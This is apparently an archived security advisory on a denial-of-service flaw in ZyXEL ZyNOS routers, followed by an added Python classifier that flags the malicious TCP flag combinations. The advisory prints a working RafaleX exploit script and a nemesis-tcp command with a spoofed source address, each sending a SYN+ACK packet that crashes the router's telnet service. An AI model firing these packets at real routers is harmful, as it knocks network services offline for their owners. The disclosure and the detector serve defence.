COMMAND

    ZyXEL ZyNOS remote service DoS

SYSTEMS AFFECTED

    ZyXEL 642R(-11) AJ.6 and other routers based on ZyNOS

PROBLEM

    Ueli Kistler [iuk@gmx.ch] of eclipse [http://www.packx.net]
    [http://www.eclipse.fr.fm], says:

    A ZyXEL router service can be crashed by sending a packet with the
    TCP flags ACK and SYN set at the same time. The service will not be
    available even through RS-232. Using a SYN-FIN packet will make the
    service port inaccessible for a few minutes.

    Affected services on ZyXEL 642R-11 are: TELNET, FTP and DHCP (if
    enabled). TELNET and FTP cannot be deactivated.

    Exploit
    -------

    # This is a RafaleX script (Download: www.packx.net)
    # Rafale X script
    # ---------------
    # Action : Make a ZyXEL 642R Prestige Router inaccessible on port 23
    #
    %name=ZyXEL telnet service DoS
    %category=Denial of service
    %date=23-05-2002
    %rafalemin=0.2
    %description=Crash ZyXEL router telnet service with ACK and SYN flag

    // Variables
    $done=Target attacked...

    // Do the stuff...
    !Display=Please wait...
    !Sleep 500
    PORTDST=23
    IPHEADERSIZE=20
    ACK=1
    SYN=1
    !Display=Sending the packet...
    !SEND 1 TCP
    !Sleep 200
    !Display=ACK/SYN Packet sent! ZyXEL telnet service crashed (V2.50(AJ.6))
    !Sleep 1000
    !Display=$done

    NOTE: Set these values as well; Rafale used them by default:
    ACK=0, SEQ=0, WIN=0

    Example with nemesis:

    nemesis-tcp -v -S %spoofed IP possible% -D %ZyXEL router% -fS -fA -w 0 -s 0 -a 0 -y 23

SOLUTION

    None yet
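
The two flag patterns described in this advisory can be recognised by a filter or sensor placed in front of the router. The following Python classifier is an added example, not part of the original advisory; the watched ports (21 and 23), the function names and the sample headers are assumptions constructed for illustration.

```python
import struct

# Assumption: TCP service ports named in the advisory (FTP 21, TELNET 23).
WATCHED_PORTS = {21, 23}
FIN, SYN, ACK = 0x01, 0x02, 0x10


def build_tcp(sport, dport, seq, ack, flags, window):
    """Build a bare 20-byte TCP header (constructed sample input, checksum 0)."""
    return struct.pack("!HHIIHHHH", sport, dport, seq, ack,
                       (5 << 12) | flags, window, 0, 0)


def classify(segment):
    """Return a verdict for one inbound TCP header aimed at the router."""
    if len(segment) < 20:
        return "malformed"
    sport, dport, seq, ack, off_flags, window = struct.unpack(
        "!HHIIHH", segment[:16])
    flags = off_flags & 0x3F
    if dport not in WATCHED_PORTS:
        return "ignore"
    # Header values the advisory's NOTE lists: SEQ=0, ACK number=0, WIN=0.
    zeroed = " (seq/ack/win all zero)" if (seq, ack, window) == (0, 0, 0) else ""
    if flags & SYN and flags & FIN:
        return "drop: SYN+FIN" + zeroed
    # A listening service is opened with a bare SYN; SYN+ACK is only a
    # reply to a connection the host itself started.
    if flags & SYN and flags & ACK:
        return "drop: SYN+ACK to listening port" + zeroed
    return "pass"


# Constructed sample headers (not captured traffic).
SAMPLES = [
    build_tcp(40000, 23, 1000, 0, SYN, 8192),   # normal connection attempt
    build_tcp(40001, 23, 0, 0, SYN | ACK, 0),   # SYN+ACK pattern from the advisory
    build_tcp(40002, 21, 5, 0, SYN | FIN, 512), # SYN+FIN pattern from the advisory
    build_tcp(40003, 80, 0, 0, SYN | ACK, 0),   # not a watched port
    b"\x00\x17",                                # truncated header
]


def scan(segments):
    """Classify every header and return the verdicts in order."""
    return [classify(s) for s in segments]


if __name__ == "__main__":
    for verdict in scan(SAMPLES):
        print(verdict)
```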